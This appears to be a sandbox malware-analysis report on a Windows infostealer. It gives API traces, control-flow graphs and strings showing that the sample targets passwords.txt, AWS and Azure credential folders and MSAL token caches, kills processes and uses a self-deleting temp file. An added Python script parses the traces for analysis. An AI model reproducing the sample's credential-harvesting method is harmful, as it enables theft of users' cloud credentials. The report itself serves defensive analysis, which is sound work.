• Associated: 00000004.00000002.1880075791.000000000096C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.000000000098B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000A43000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000A77000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880380728.0000000000A79000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_340000_bind.jbxd
Yara matches
Similarity
• API ID: Internetlstrlen$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocConnectCrackFileOptionProcessReadSend
• String ID: "$------$build_id$f5$f5$mode
• API String ID: 487080699-4225693864
• Opcode ID: 8c0c3466e8cf1e08459cba101deef26fccc6b148523bd21e3c2ea608d5bb61f2
• Instruction ID: 77137727356b2f29b0b5274836a8b51764458c3c7a27c330efbca5be2e73b41f
• Opcode Fuzzy Hash: 8c0c3466e8cf1e08459cba101deef26fccc6b148523bd21e3c2ea608d5bb61f2
• Instruction Fuzzy Hash: 39127772800009ABDB06EBE4DC96DEEB7BCBF25304F454165F512BA0A1EF346B49CB94

Control-flow Graph

                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 0034E57D: lstrcpyA.KERNEL32(00000000,00000000,0000000C,?,00355870,0035E266), ref: 0034E5A7
                                                                                                                                                                                        • Part of subcall function 0034F6B1: GetSystemTime.KERNEL32(00000000,0035E266,0035E266,00361ECC,00000000), ref: 0034F6DA
                                                                                                                                                                                        • Part of subcall function 0034E6D4: lstrlenA.KERNEL32(?,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E6EC
                                                                                                                                                                                        • Part of subcall function 0034E6D4: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E714
                                                                                                                                                                                        • Part of subcall function 0034E6D4: lstrcatA.KERNEL32(?,00000000,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E71F
                                                                                                                                                                                        • Part of subcall function 0034E682: lstrcpyA.KERNEL32(00000000,?,0035E266,00000000,00361ECC,?,00354A13,00000000,?,?,0035E266,00000000), ref: 0034E6BB
                                                                                                                                                                                        • Part of subcall function 0034E682: lstrcatA.KERNEL32(?,?,?,00354A13,00000000,?,?,0035E266,00000000), ref: 0034E6C5
                                                                                                                                                                                        • Part of subcall function 0034E63B: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,0035592A,00000000,?,?,00361408,?,00000000), ref: 0034E674
                                                                                                                                                                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0034B6A1
                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 0034B6F8
                                                                                                                                                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 0034B6FF
                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000,00000000), ref: 0034B794
                                                                                                                                                                                      • lstrcatA.KERNEL32(?), ref: 0034B7AC
                                                                                                                                                                                      • lstrcatA.KERNEL32(?,00000000), ref: 0034B7BE
                                                                                                                                                                                      • lstrcatA.KERNEL32(?,003614B0), ref: 0034B7CC
                                                                                                                                                                                      • lstrcatA.KERNEL32(?,00000000), ref: 0034B7DE
                                                                                                                                                                                      • lstrcatA.KERNEL32(?,003614AC), ref: 0034B7EC
                                                                                                                                                                                      • lstrcatA.KERNEL32(?), ref: 0034B7FB
                                                                                                                                                                                      • lstrcatA.KERNEL32(?,00000000), ref: 0034B80D
                                                                                                                                                                                      • lstrcatA.KERNEL32(?,003613FC), ref: 0034B817
                                                                                                                                                                                      • lstrcatA.KERNEL32(?), ref: 0034B826
                                                                                                                                                                                      • lstrcatA.KERNEL32(?,00000000), ref: 0034B838
                                                                                                                                                                                      • lstrcatA.KERNEL32(?,003613FC), ref: 0034B842
                                                                                                                                                                                      • lstrcatA.KERNEL32(?), ref: 0034B851
                                                                                                                                                                                      • lstrcatA.KERNEL32(?,00000000), ref: 0034B863
                                                                                                                                                                                      • lstrcatA.KERNEL32(?,003613FC), ref: 0034B86D
                                                                                                                                                                                      • lstrcatA.KERNEL32(?,003613FC), ref: 0034B877
                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 0034B8A3
                                                                                                                                                                                      • memset.MSVCRT ref: 0034B8E9
                                                                                                                                                                                      • DeleteFileA.KERNEL32(00000000), ref: 0034B916
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
• Associated: 00000004.00000002.1879560972.0000000000340000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1879601735.000000000035E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000866000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.000000000086C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000870000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000963000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000966000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.000000000096C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.000000000098B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000A43000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000A77000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880380728.0000000000A79000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_340000_bind.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTimememset
                                                                                                                                                                                      • String ID: f5$passwords.txt
                                                                                                                                                                                      • API String ID: 1973479514-1123254558
                                                                                                                                                                                      • Opcode ID: ee898684aeea5387038cabc62d8f79f7bc40083738afb4a30bf6bf4a45499b11
                                                                                                                                                                                      • Instruction ID: b0edf718066643de52becd1df616e550e2e1a8feedf43e4027dfcc00a79c4e79
                                                                                                                                                                                      • Opcode Fuzzy Hash: ee898684aeea5387038cabc62d8f79f7bc40083738afb4a30bf6bf4a45499b11
                                                                                                                                                                                      • Instruction Fuzzy Hash: 9DA11472804108ABDF06FBE0ED4ACEE7BB9FF14315F5040A5F506AA0A1EF31AA55DB50

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
control_flow_graph 2659 346e1b-346e39 call 34e741 2662 346e40-346e53 call 34e741 2659->2662 2663 346e3b-346e3e 2659->2663 2664 346e55-346e5b call 34e5f1 2662->2664 2668 346e5d-346e6a call 34e741 2662->2668 2663->2664 2670 346e70-346ef5 call 34e57d call 34f6b1 call 34e6d4 call 34e682 call 34e6d4 call 34e682 call 34e63b call 34e5e8 * 5 2664->2670 2668->2670 2675 347347-34736b call 34e5e8 * 3 call 341301 2668->2675 2706 346f0d-346f29 call 34e766 * 2 CopyFileA 2670->2706 2711 346ef7-346f0a call 34e5b4 call 34fb69 2706->2711 2712 346f2b-346fa4 call 34e57d call 34e6d4 call 34e63b call 34e5e8 call 34e6d4 call 34e63b call 34e5e8 call 34e682 call 34e63b call 34e5e8 2706->2712 2711->2706 2737 346fa6-346fbe call 34e6d4 call 34e63b 2712->2737 2738 346fc0-34700e call 34e6d4 call 34e63b call 34e5e8 call 34e682 call 34e6d4 call 34e63b call 34e5e8 2712->2738 2748 347011-34702d call 34e5e8 call 34e766 call 61ead2ac 2737->2748 2738->2748 2760 347033-34704e call 61e84e02 2748->2760 2761 347318-34732a call 34e766 DeleteFileA call 34e72d 2748->2761 2768 347304-34730d 2760->2768 2769 347054-34706a GetProcessHeap RtlAllocateHeap 2760->2769 2771 34732f-347342 call 34e72d call 34e5e8 * 2 2761->2771 2866 347310 call 61e55691 2768->2866 2867 347310 call 61e55699 2768->2867 2863 34706d call 61e74dc5 2769->2863 2864 34706d call 61e748dc 2769->2864 2865 34706d call 61e7485a 2769->2865 2771->2675 2773 347073-347077 2775 3472a7-3472b3 lstrlenA 2773->2775 2776 34707d-347082 2773->2776 2780 3472f5-347301 memset 2775->2780 2781 3472b5-3472e2 lstrlenA call 34e5b4 call 341324 call 3526f8 2775->2781 2779 347087-347118 call 34e57d * 6 call 34e741 2776->2779 2778 347316-347317 2778->2761 2812 347122 2779->2812 2813 34711a-347120 2779->2813 2780->2768 2794 3472e7-3472f0 call 34e5e8 2781->2794 2794->2780 2814 347128-34713b call 34e5f1 call 34e741 2812->2814 2813->2814 2819 347145 2814->2819 2820 34713d-347143 2814->2820 2821 34714b-34715c call 34e5f1 call 34e75a 2819->2821 2820->2821 2826 347167-3472a1 call 34e766 lstrcatA * 2 call 34e766 lstrcatA * 2 call 34e766 lstrcatA * 2 call 34e766 lstrcatA * 2 call 34e766 lstrcatA * 2 call 34e766 lstrcatA * 2 call 346bb0 call 34e766 lstrcatA call 34e5e8 lstrcatA call 34e5e8 * 6 2821->2826 2827 34715e-347162 call 34e5f1 2821->2827 2826->2775 2826->2779 2827->2826 2863->2773 2864->2773 2865->2773 2866->2778 2867->2778
                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 0034E741: StrCmpCA.SHLWAPI(?,?,?,00348A9A,00361404,00000000), ref: 0034E74A
                                                                                                                                                                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00346F21
                                                                                                                                                                                        • Part of subcall function 0034E5B4: lstrcpyA.KERNEL32(00000000,SJ5,SJ5,?,?,00341334,SJ5,0035E266,00000000,?,00354A53,?), ref: 0034E5DA
                                                                                                                                                                                        • Part of subcall function 0034FB69: memset.MSVCRT ref: 0034FB86
                                                                                                                                                                                        • Part of subcall function 0034FB69: OpenProcess.KERNEL32(00001001,00000000,?,0035E264,0035E266), ref: 0034FC0D
                                                                                                                                                                                        • Part of subcall function 0034FB69: TerminateProcess.KERNEL32(00000000,00000000), ref: 0034FC1B
                                                                                                                                                                                        • Part of subcall function 0034FB69: CloseHandle.KERNEL32(00000000), ref: 0034FC22
                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 0034705A
                                                                                                                                                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00347061
                                                                                                                                                                                        • Part of subcall function 0034E6D4: lstrlenA.KERNEL32(?,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E6EC
                                                                                                                                                                                        • Part of subcall function 0034E6D4: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E714
                                                                                                                                                                                        • Part of subcall function 0034E6D4: lstrcatA.KERNEL32(?,00000000,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E71F
                                                                                                                                                                                        • Part of subcall function 0034E63B: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,0035592A,00000000,?,?,00361408,?,00000000), ref: 0034E674
                                                                                                                                                                                        • Part of subcall function 0034E57D: lstrcpyA.KERNEL32(00000000,00000000,0000000C,?,00355870,0035E266), ref: 0034E5A7
                                                                                                                                                                                      • lstrcatA.KERNEL32(?,00000000,00000000,00361404,00361404,00000000), ref: 00347173
                                                                                                                                                                                      • lstrcatA.KERNEL32(?,00361400), ref: 0034717D
                                                                                                                                                                                      • lstrcatA.KERNEL32(?,00000000), ref: 0034718F
                                                                                                                                                                                      • lstrcatA.KERNEL32(?,00361400), ref: 00347199
                                                                                                                                                                                      • lstrcatA.KERNEL32(?,00000000), ref: 003471AB
                                                                                                                                                                                      • lstrcatA.KERNEL32(?,00361400), ref: 003471B5
                                                                                                                                                                                      • lstrcatA.KERNEL32(?,00000000), ref: 003471C7
                                                                                                                                                                                      • lstrcatA.KERNEL32(?,00361400), ref: 003471D1
                                                                                                                                                                                      • lstrcatA.KERNEL32(?,00000000), ref: 003471E3
                                                                                                                                                                                      • lstrcatA.KERNEL32(?,00361400), ref: 003471ED
                                                                                                                                                                                      • lstrcatA.KERNEL32(?,00000000), ref: 003471FF
                                                                                                                                                                                      • lstrcatA.KERNEL32(?,00361400), ref: 00347209
                                                                                                                                                                                      • lstrcatA.KERNEL32(?,00000000), ref: 00347248
                                                                                                                                                                                      • lstrcatA.KERNEL32(?,003613FC), ref: 0034725E
                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 003472AA
                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 003472B8
                                                                                                                                                                                      • memset.MSVCRT ref: 003472FC
                                                                                                                                                                                      • DeleteFileA.KERNEL32(00000000), ref: 00347321
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
• Associated: 00000004.00000002.1879560972.0000000000340000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1879601735.000000000035E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000866000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.000000000086C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000870000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000963000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000966000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.000000000096C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.000000000098B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000A43000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000A77000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880380728.0000000000A79000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_340000_bind.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: lstrcat$lstrcpy$Processlstrlen$FileHeapmemset$AllocateCloseCopyDeleteHandleOpenTerminate
                                                                                                                                                                                      • String ID: d5$f5
                                                                                                                                                                                      • API String ID: 1765998009-2694806845
                                                                                                                                                                                      • Opcode ID: 1dca8311178bb5cf436ef5d10040566c09fc8ed0fb44d4c238ed890e38466794
                                                                                                                                                                                      • Instruction ID: c59cf1997931f541086e61b017ddc527e52a24560e40f3d219f2215047ac11a9
                                                                                                                                                                                      • Opcode Fuzzy Hash: 1dca8311178bb5cf436ef5d10040566c09fc8ed0fb44d4c238ed890e38466794
                                                                                                                                                                                      • Instruction Fuzzy Hash: 8DE10671804109ABDF06FBE0ED9ACEE7BB9FF11315F504165F406AA0A1EF31AA46DB50
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetTempPathW.KERNEL32(00000104,?), ref: 00341154
                                                                                                                                                                                      • wsprintfW.USER32 ref: 0034117A
                                                                                                                                                                                      • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000100,00000000), ref: 003411AA
                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000008,000FFFFF), ref: 003411BF
                                                                                                                                                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 003411C6
                                                                                                                                                                                      • _time64.MSVCRT ref: 003411CF
                                                                                                                                                                                      • srand.MSVCRT ref: 003411D5
                                                                                                                                                                                      • rand.MSVCRT ref: 003411DA
                                                                                                                                                                                      • memset.MSVCRT ref: 003411EA
                                                                                                                                                                                      • WriteFile.KERNEL32(?,00000000,000FFFFF,?,00000000), ref: 003411FC
                                                                                                                                                                                      • memset.MSVCRT ref: 00341216
                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00341221
                                                                                                                                                                                      • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,04000100,00000000), ref: 0034123D
                                                                                                                                                                                      • ReadFile.KERNEL32(00000000,00000000,000FFFFF,?,00000000), ref: 00341253
                                                                                                                                                                                      • memset.MSVCRT ref: 00341265
                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0034126F
                                                                                                                                                                                      • RtlFreeHeap.NTDLL(00000000), ref: 00341276
                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 0034127F
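The API traces in this report print raw hexadecimal arguments: the routine at 00341154 creates a file under the temp directory for write with disposition 00000002, writes 000FFFFF bytes from a heap buffer, reopens it for read with flags 04000100, reads the same 000FFFFF bytes back and frees the buffer, while the subcall at 0034FB69 (listed under the function above) opens a process with access 00001001 and terminates it. The Python below is an added example, not code from Joe Sandbox or from the analysed sample: it parses API lines in the report's own format (the sample input is a handful of lines copied from the traces above) and decodes the CreateFileW and OpenProcess arguments with the documented Win32 constants, so the write-then-read-back sequence can be read without consulting the headers. The constant tables and the round-trip matcher are this example's own choices, not a Joe Sandbox signature.

```python
# Added example: parse Joe Sandbox 'APIs' trace lines and decode the Win32 constants.
# Not code from Joe Sandbox or from the analysed sample.
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed input: lines copied from this report (routine at 00341154, subcall 0034FB69).
SAMPLE_TRACE = """\
• GetTempPathW.KERNEL32(00000104,?), ref: 00341154
• CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000100,00000000), ref: 003411AA
• GetProcessHeap.KERNEL32(00000008,000FFFFF), ref: 003411BF
• memset.MSVCRT ref: 003411EA
• WriteFile.KERNEL32(?,00000000,000FFFFF,?,00000000), ref: 003411FC
• CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,04000100,00000000), ref: 0034123D
• ReadFile.KERNEL32(00000000,00000000,000FFFFF,?,00000000), ref: 00341253
  • Part of subcall function 0034FB69: OpenProcess.KERNEL32(00001001,00000000,?,0035E264,0035E266), ref: 0034FC0D
  • Part of subcall function 0034FB69: TerminateProcess.KERNEL32(00000000,00000000), ref: 0034FC1B
"""

LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$")

# Documented Win32 constants (winnt.h / fileapi.h); only the bits relevant to this report.
GENERIC_ACCESS = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE"}
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING", 4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
FILE_FLAGS = {0x80: "FILE_ATTRIBUTE_NORMAL", 0x100: "FILE_ATTRIBUTE_TEMPORARY",
              0x04000000: "FILE_FLAG_DELETE_ON_CLOSE", 0x08000000: "FILE_FLAG_SEQUENTIAL_SCAN"}
PROCESS_ACCESS = {0x1: "PROCESS_TERMINATE", 0x10: "PROCESS_VM_READ", 0x20: "PROCESS_VM_WRITE",
                  0x400: "PROCESS_QUERY_INFORMATION", 0x1000: "PROCESS_QUERY_LIMITED_INFORMATION"}

@dataclass
class ApiCall:
    api: str
    module: str
    args: list                     # int for hex values, None for '?', str for an inline literal
    ref: int                       # call-site address
    subcall: Optional[int] = None  # set when the line is marked 'Part of subcall function'

def _arg(tok: str):
    tok = tok.strip()
    if tok == "?":
        return None
    try:
        return int(tok, 16)
    except ValueError:
        return tok                 # e.g. the 'SJ5' literal printed in the lstrcpyA lines above

def parse_trace(text: str) -> List[ApiCall]:
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue               # headings such as 'Strings', blank lines
        args = [_arg(t) for t in (m.group("args") or "").split(",") if t.strip()]
        sub = int(m.group("sub"), 16) if m.group("sub") else None
        calls.append(ApiCall(m.group("api"), m.group("module"), args, int(m.group("ref"), 16), sub))
    return calls

def decode_flags(value: int, table: Dict[int, str]) -> List[str]:
    names, rest = [], value
    for bit, name in sorted(table.items()):
        if (value & bit) == bit:
            names.append(name)
            rest &= ~bit
    if rest:
        names.append(hex(rest))    # bits the table does not know
    return names

def describe(call: ApiCall) -> str:
    a = call.args
    if call.api == "CreateFileW" and len(a) >= 6 and all(isinstance(x, int) for x in a[1:6]):
        return "CreateFileW access=%s disposition=%s flags=%s" % (
            "|".join(decode_flags(a[1], GENERIC_ACCESS)), DISPOSITION.get(a[4], hex(a[4])),
            "|".join(decode_flags(a[5], FILE_FLAGS)))
    if call.api == "OpenProcess" and a and isinstance(a[0], int):
        return "OpenProcess access=%s" % "|".join(decode_flags(a[0], PROCESS_ACCESS))
    shown = ", ".join("?" if x is None else (hex(x) if isinstance(x, int) else x) for x in a)
    return f"{call.api}.{call.module}({shown})"

def find_scratch_file_roundtrip(calls: List[ApiCall]) -> Optional[dict]:
    """Match CreateFileW(write, CREATE_ALWAYS) -> WriteFile(n) -> CreateFileW(read, OPEN_EXISTING) -> ReadFile(n)."""
    w_open = w = r_open = r = None
    for c in calls:
        if c.api == "CreateFileW" and len(c.args) >= 6 and all(isinstance(x, int) for x in c.args[1:6]):
            if w_open is None and (c.args[1] & 0x40000000) and c.args[4] == 2:
                w_open = c
            elif w is not None and (c.args[1] & 0x80000000) and c.args[4] == 3:
                r_open = c
        elif c.api == "WriteFile" and w_open is not None and w is None and len(c.args) >= 3:
            w = c
        elif c.api == "ReadFile" and r_open is not None and r is None and len(c.args) >= 3:
            r = c
    if None in (w_open, w, r_open, r):
        return None
    return {"bytes": w.args[2], "same_size": w.args[2] == r.args[2],
            "delete_on_close": bool(r_open.args[5] & 0x04000000),
            "refs": [f"{c.ref:08X}" for c in (w_open, w, r_open, r)]}

if __name__ == "__main__":
    trace = parse_trace(SAMPLE_TRACE)
    for c in trace:
        print(f"{c.ref:08X}  {describe(c)}")
    print(find_scratch_file_roundtrip(trace))
```

Run against the lines above, the second CreateFileW decodes to GENERIC_READ, OPEN_EXISTING, FILE_ATTRIBUTE_TEMPORARY | FILE_FLAG_DELETE_ON_CLOSE, so the scratch file is removed by the kernel when the read handle is closed and no DeleteFile call is needed; the OpenProcess access 00001001 decodes to PROCESS_TERMINATE | PROCESS_QUERY_LIMITED_INFORMATION, the rights needed to kill a process. The matcher returns the byte count (0xFFFFF) and the four call-site addresses, which is the form a hunting note or a Yara/behaviour rule would cite.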
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
• Associated: 00000004.00000002.1879560972.0000000000340000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1879601735.000000000035E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000866000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.000000000086C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000870000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000963000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000966000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.000000000096C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.000000000098B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000A43000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000A77000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                      • Associated: 00000004.00000002.1880380728.0000000000A79000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_340000_bind.jbxd
Yara matches
Similarity
• API ID: FileHeap$memset$CloseCreateHandleProcess$AllocateFreePathReadTempWrite_time64randsrandwsprintf
• String ID: %s%s$delays.tmp
• API String ID: 4147405854-1413376734
• Opcode ID: 5b619303d129861195d384b8a309c2b1afb4722451f50874f9ce03d94100eb1c
• Instruction ID: 0614448b341e8b0d01a09dc38ca519d7fda5251aca4d45575c2c3e8ee2954702
• Opcode Fuzzy Hash: 5b619303d129861195d384b8a309c2b1afb4722451f50874f9ce03d94100eb1c
• Instruction Fuzzy Hash: 1231B6B1900604BBDB26ABA6DC4DEEF3B7CEF85751F000965F515E60A0DAB09A84CE71
APIs
• memset.MSVCRT ref: 0035443E
  • Part of subcall function 0034F83B: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?), ref: 0034F869
• lstrcatA.KERNEL32(?,00000000), ref: 00354460
• lstrcatA.KERNEL32(?,\.azure\), ref: 0035447A
  • Part of subcall function 00353FEA: wsprintfA.USER32 ref: 00354005
  • Part of subcall function 00353FEA: FindFirstFileA.KERNEL32(?,?), ref: 0035401C
  • Part of subcall function 00353FEA: StrCmpCA.SHLWAPI(?,0035E258), ref: 00354049
  • Part of subcall function 00353FEA: StrCmpCA.SHLWAPI(?,0035E254), ref: 00354063
  • Part of subcall function 00353FEA: wsprintfA.USER32 ref: 00354083
  • Part of subcall function 00353FEA: StrCmpCA.SHLWAPI(?,0035E266), ref: 00354090
  • Part of subcall function 00353FEA: wsprintfA.USER32 ref: 003540AD
  • Part of subcall function 00353FEA: PathMatchSpecA.SHLWAPI(?,?), ref: 003540D0
  • Part of subcall function 00353FEA: lstrcatA.KERNEL32(?,?,000003E8), ref: 003540FC
  • Part of subcall function 00353FEA: lstrcatA.KERNEL32(?,0035E264), ref: 0035410A
  • Part of subcall function 00353FEA: lstrcatA.KERNEL32(?,?), ref: 0035411A
  • Part of subcall function 00353FEA: lstrcatA.KERNEL32(?,0035E264), ref: 00354128
  • Part of subcall function 00353FEA: lstrcatA.KERNEL32(?,?), ref: 0035413C
• memset.MSVCRT ref: 003544B5
• lstrcatA.KERNEL32(?,00000000), ref: 003544DC
• lstrcatA.KERNEL32(?,\.aws\), ref: 003544F6
  • Part of subcall function 00353FEA: wsprintfA.USER32 ref: 003540BD
  • Part of subcall function 00353FEA: CopyFileA.KERNEL32(?,00000000,00000001), ref: 003541D4
  • Part of subcall function 00353FEA: DeleteFileA.KERNEL32(00000000), ref: 00354241
  • Part of subcall function 00353FEA: FindNextFileA.KERNEL32(?,?), ref: 0035428B
• memset.MSVCRT ref: 00354527
• lstrcatA.KERNEL32(?,00000000), ref: 0035454E
• lstrcatA.KERNEL32(?,\.IdentityService\), ref: 00354568
  • Part of subcall function 00353FEA: FindClose.KERNEL32(?), ref: 0035429C
• memset.MSVCRT ref: 0035459D
Strings
Memory Dump Source
• Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
Yara matches
Similarity
• API ID: lstrcat$Filememsetwsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
• String ID: *.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$f5$msal.cache
• API String ID: 2861501092-3983909078
• Opcode ID: f3306aeb85c6a45d682b05e572bdae66e471d41d35bbdc3adbbdd1b9d98936e7
• Instruction ID: 997d48552d852955a0bde2e5503ae81150d91b25a5341fb4eb4dab682e45ad72
• Opcode Fuzzy Hash: f3306aeb85c6a45d682b05e572bdae66e471d41d35bbdc3adbbdd1b9d98936e7
• Instruction Fuzzy Hash: A7417472D4011C77CF16FBF0DC4BEDE77ACAB48301F0449A6B615EB091EA71A7888A60
APIs
  • Part of subcall function 0034E5B4: lstrcpyA.KERNEL32(00000000,SJ5,SJ5,?,?,00341334,SJ5,0035E266,00000000,?,00354A53,?), ref: 0034E5DA
  • Part of subcall function 00343EF3: ??_U@YAPAXI@Z.MSVCRT(00000400,00361C14,ERROR), ref: 00343F1F
  • Part of subcall function 00343EF3: ??_U@YAPAXI@Z.MSVCRT(00000400,00000400,00361C14,ERROR), ref: 00343F28
  • Part of subcall function 00343EF3: ??_U@YAPAXI@Z.MSVCRT(00000400,00000400,00000400,00361C14,ERROR), ref: 00343F31
  • Part of subcall function 00343EF3: lstrlenA.KERNEL32(00000000,00000000,?,?,00361C14,ERROR), ref: 00343F4B
